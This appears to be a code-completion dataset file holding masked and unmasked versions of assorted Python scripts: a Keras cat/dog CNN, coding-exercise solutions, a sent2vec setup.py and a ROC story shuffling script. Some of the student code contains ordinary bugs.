val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ['Dog', 'Cat']
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
model = tf.keras.models.load_model('64x3-CNN.model')
prediction = model.predict([prepare('dog.jpg')])
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
prediction = model.predict([prepare('cat.jpg')])
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| '''
!pip install wget
from zipfile import ZipFile
import wget
print('Beginning file downlaod with wget module')
url = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip'
wget.download(url, 'sample_data/')
print('2. Extract all files in ZIP to different directory')
# Create a ZipFile Object and load sample.zip in it
with ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj:
# Extract all the contents of zip file in different directory
zipObj.extractall('content/')
'''
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
import pickle
import random
import datetime
import tensorflow as tf
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.optimizers import Adam
from tensorflow.python.keras.callbacks import TensorBoard
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog'] #'''categories that we have to deal with'''
img_array= []
for category in CATEGORIES:
path = os.path.join(DATADIR, category) # path to cats and dogs dir
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299 #every image of 299x299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray') # cmap = hot, plasma, cool,
plt.show()
training_data = []
def create_training_data(): # creating training datasets
for category in CATEGORIES:
path = os.path.join(DATADIR, category) # path to cats and dogs dir
classIndex = CATEGORIES.index(category) # 0 for dog and 1 for cat
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
'''shuffle training data'''
random.shuffle(training_data)
# for sample in training_data[:10]:
# print(sample[1])
x=[]
y=[]
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3) #we can't pass a list to keras for training
#'''we have to pass here a numpy array '''
# print(x[0].reshape(-1, IMG_SIZE, IMG_SIZE, 1))
pickle_out = open("x.pickle", 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out= open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]#(224, 224, 3)
DROPOUT=0.2
NB_CLASSES=10
NB_EPOCHS=10
BATCH_SIZE=128
VALIDATION_SPLIT=0.2
OPTIMIZER = Adam()
max, min, accIndex , lossIndex=70.0 , 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0] # 0, 1,2
layer_sizes = [512, 256, 128, 64] #32, 64, 128, 256, 512
conv_layers = [3, 2, 1] # 1, 2,3
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer-1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
model.compile(loss='categorical_crossentropy',
optimizer=OPTIMIZER,
metrics=['accuracy'],
)
history = model.fit(x, y,
batch_size=BATCH_SIZE,
epochs=NB_EPOCHS,
validation_split=VALIDATION_SPLIT,
verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex-1, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"), "wb")
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex>=2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex-1, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ["Dog", "Cat"] # will use this to convert prediction num to string value
def prepare(filepath):
IMG_SIZE = 299 # 50 in txt-based
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR) # read in the image, convert to grayscale
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.
model = tf.keras.models.load_model("64x3-CNN.model")
prediction = model.predict([prepare('dog.jpg')]) # REMEMBER YOU'RE PASSING A LIST OF THINGS YOU WISH TO PREDICT
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
#We can also test our cat example:
prediction = model.predict([prepare('cat.jpg')])
print(prediction) # will be a list in a list.
print(CATEGORIES[int(prediction[0][0])])
'''
alpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) results in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training
beta1. The exponential decay rate for the first moment estimates (e.g. 0.9).
beta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems).
epsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8).
We can see that the popular deep learning libraries generally use the default parameters recommended by the paper.
TensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08.
Keras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0.
Blocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1.
Lasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08
Caffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08
MxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8
Torch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8
''' | [
1,
3,
4,
5,
6
] |
22 | 95c5971a102fb2ed84ab0de0471278d0167d8359 | <mask token>
| <mask token>
def matrix_divided(matrix, div):
"""Divides a Matrix
Args:
matrix: A list of lists of ints or floats
div: a non zero int or float
Exceptions:
TypeError: if the matrix and/or div is not as stated or the matrix elements
are not of the same size
ZeroDivisionError: if div is zero
Returns: a new matrix holding the results
"""
workmat = []
WrongType = False
TooLong = False
i = 0
if isinstance(matrix, list):
if matrix == []:
WrongType = True
for x in range(len(matrix)):
if isinstance(matrix[x], list):
workmat.append([])
for y in range(len(matrix[x])):
if matrix[x] == []:
WrongType = True
if isinstance(matrix[x][y], int) or isinstance(matrix[x
][y], int):
workmat[x].append(matrix[x][y])
else:
WrongType = True
if x == 0 and y == 0:
i = len(matrix[x])
elif not i == len(matrix[x]):
TooLong = True
else:
WrongType = True
else:
WrongType = True
if WrongType:
raise TypeError(
'matrix must be a matrix (list of lists) of integers/floats')
if TooLong:
raise TypeError('Each row of the matrix must have the same size')
if not isinstance(div, float) and not isinstance(div, int):
raise TypeError('div must be a number')
if div == 0:
raise ZeroDivisionError('division by zero')
for x in range(len(workmat)):
for y in range(len(workmat[x])):
workmat[x][y] = round(workmat[x][y] / div, 2)
return workmat
| #!/usr/bin/python3
"""1. Divide a matrix """
def matrix_divided(matrix, div):
"""Divides a Matrix
Args:
matrix: A list of lists of ints or floats
div: a non zero int or float
Exceptions:
TypeError: if the matrix and/or div is not as stated or the matrix elements
are not of the same size
ZeroDivisionError: if div is zero
Returns: a new matrix holding the results
"""
workmat = []
WrongType = False
TooLong = False
i = 0
if isinstance(matrix, list):
if matrix == []:
WrongType = True
for x in range(len(matrix)):
if isinstance(matrix[x], list):
workmat.append([])
for y in range(len(matrix[x])):
if matrix[x] == []:
WrongType = True
if (
isinstance(matrix[x][y], int) or
isinstance(matrix[x][y], int)
):
workmat[x].append(matrix[x][y])
else:
WrongType = True
if x == 0 and y == 0:
i = len(matrix[x])
else:
if not i == len(matrix[x]):
TooLong = True
else:
WrongType = True
else:
WrongType = True
if WrongType:
raise TypeError(
"matrix must be a matrix (list of lists) of integers/floats")
if TooLong:
raise TypeError(
"Each row of the matrix must have the same size")
if not isinstance(div, float) and not isinstance(div, int):
raise TypeError(
"div must be a number")
if div == 0:
raise ZeroDivisionError(
"division by zero")
for x in range(len(workmat)):
for y in range(len(workmat[x])):
workmat[x][y] = round((workmat[x][y] / div), 2)
return workmat
| null | null | [
0,
1,
2
] |
23 | 5fb998fa761b989c6dd423634824197bade4f8a5 | <mask token>
| <mask token>
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
<mask token>
| <mask token>
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| <mask token>
import math
import os
import random
import re
import sys
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| """
You can perform the following operations on the string, :
Capitalize zero or more of 's lowercase letters.
Delete all of the remaining lowercase letters in .
Given two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.
For example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.
Function Description
Complete the function in the editor below. It must return either or .
abbreviation has the following parameter(s):
a: the string to modify
b: the string to match
Input Format
The first line contains a single integer , the number of queries.
Each of the next pairs of lines is as follows:
- The first line of each query contains a single string, .
- The second line of each query contains a single string, .
Constraints
String consists only of uppercase and lowercase English letters, ascii[A-Za-z].
String consists only of uppercase English letters, ascii[A-Z].
Output Format
For each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.
Sample Input
1
daBcd
ABC
Sample Output
YES
Explanation
image
We have daBcd and ABC. We perform the following operation:
Capitalize the letters a and c in so that dABCd.
Delete all the remaining lowercase letters in so that ABC.
Because we were able to successfully convert to , we print YES on a new line.
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the abbreviation function below.
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [[False]*(m+1) for _ in range(n+1)]
dp[0][0] = True
for i in range(n+1):
for j in range(1,m+1):
if a[j-1] == b[i-1]:
dp[i][j] = dp[i-1][j-1]
elif a[j-1].upper() == b[i-1]:
dp[i][j] = dp[i-1][j-1] or dp[i][j-1]
elif a[j-1].islower():
dp[i][j] = dp[i][j-1]
return "YES" if dp[n][m] else "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| [
0,
1,
2,
3,
4
] |
24 | 5ed439a2a7cfb9c941c40ea0c5eba2851a0f2855 | <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
<mask token>
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
<mask token>
<mask token>
| <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
<mask token>
| <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
if __name__ == '__main__':
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
res = superStack(operations)
| import sys
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
if __name__ == '__main__':
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
res = superStack(operations)
| #!/bin/python3
# Implement a stack with push, pop, inc(e, k) operations
# inc (e,k) - Add k to each of bottom e elements
import sys
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
if __name__ == "__main__":
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
res = superStack(operations);
| [
4,
7,
8,
9,
10
] |
25 | 39f9341313e29a22ec5e05ce9371bf65e89c91bd | <mask token>
| <mask token>
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
print(numbers, '= 없다')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
| <mask token>
n_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144],
[10, 10, 10, 10, 10]]
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
print(numbers, '= 없다')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
| """
리스트에 있는 숫자들의 최빈값을 구하는 프로그램을 만들어라.
[12, 17, 19, 17, 23] = 17
[26, 37, 26, 37, 91] = 26, 37
[28, 30, 32, 34, 144] = 없다
최빈값 : 자료의 값 중에서 가장 많이 나타난 값
① 자료의 값이 모두 같거나 모두 다르면 최빈값은 없다.
② 자료의 값이 모두 다를 때, 도수가 가장 큰 값이 1개 이상 있으면 그 값은 모두 최빈값이다.
"""
n_list = [[12, 17, 19, 17, 23],
[26, 37, 26, 37, 91],
[28, 30, 32, 34, 144],
[10, 10, 10, 10, 10]]
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
print(numbers, '= 없다')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
| null | [
0,
1,
2,
3
] |
26 | 312cc666c88fcd22882c49598db8c5e18bd3dae1 | <mask token>
| <mask token>
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
<mask token>
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| <mask token>
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| from setuptools import setup, find_packages
from setuptools.extension import Extension
from sys import platform
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| from setuptools import setup, find_packages
from setuptools.extension import Extension
from sys import platform
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
# Define the C++ extension
if platform == "darwin":
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [
Extension('sent2vec',
sources=[
'sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc',
'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc',
'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc',
'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc',
'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'
],
language='c++',
extra_compile_args=extra_compile_args
)
]
extensions = cythonize(extensions)
else:
extensions = [
Extension('sent2vec',
sources=[
'sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc',
'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc',
'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc',
'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc',
'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'
],
language='c++',
extra_compile_args=extra_compile_args
)
]
# Package details
setup(
name='sent2vec',
version='0.1.0',
author='',
author_email='',
url='',
description='A Python interface for sent2vec library',
license='BSD 3-Clause License',
packages=['sent2vec'],
ext_modules = extensions,
install_requires=[],
classifiers= []
)
| [
0,
1,
2,
3,
4
] |
27 | 2aec0581413d4fb0ffb4090231fde0fed974bf18 | <mask token>
| <mask token>
with open('./roc.txt', 'r') as fin:
with open('./roc_shuffle.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1, 5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_repeat.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1, 4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_replace.txt', 'w') as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {'1': [], '2': [], '3': [], '4': [], '5': []}
for p in post:
for i in range(5):
data['%d' % (i + 1)].append(p[i])
random_data = data.copy()
for i in range(5):
random_data['%d' % (i + 1)] = np.random.permutation(random_data
['%d' % (i + 1)])
for k in range(len(post)):
idx = np.random.permutation(range(1, 5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\n')
else:
fout.write(' '.join(data['%d' % (i + 1)][k]) + '\n')
fout.write('------\n')
| import numpy as np
import random
with open('./roc.txt', 'r') as fin:
with open('./roc_shuffle.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1, 5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_repeat.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1, 4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_replace.txt', 'w') as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {'1': [], '2': [], '3': [], '4': [], '5': []}
for p in post:
for i in range(5):
data['%d' % (i + 1)].append(p[i])
random_data = data.copy()
for i in range(5):
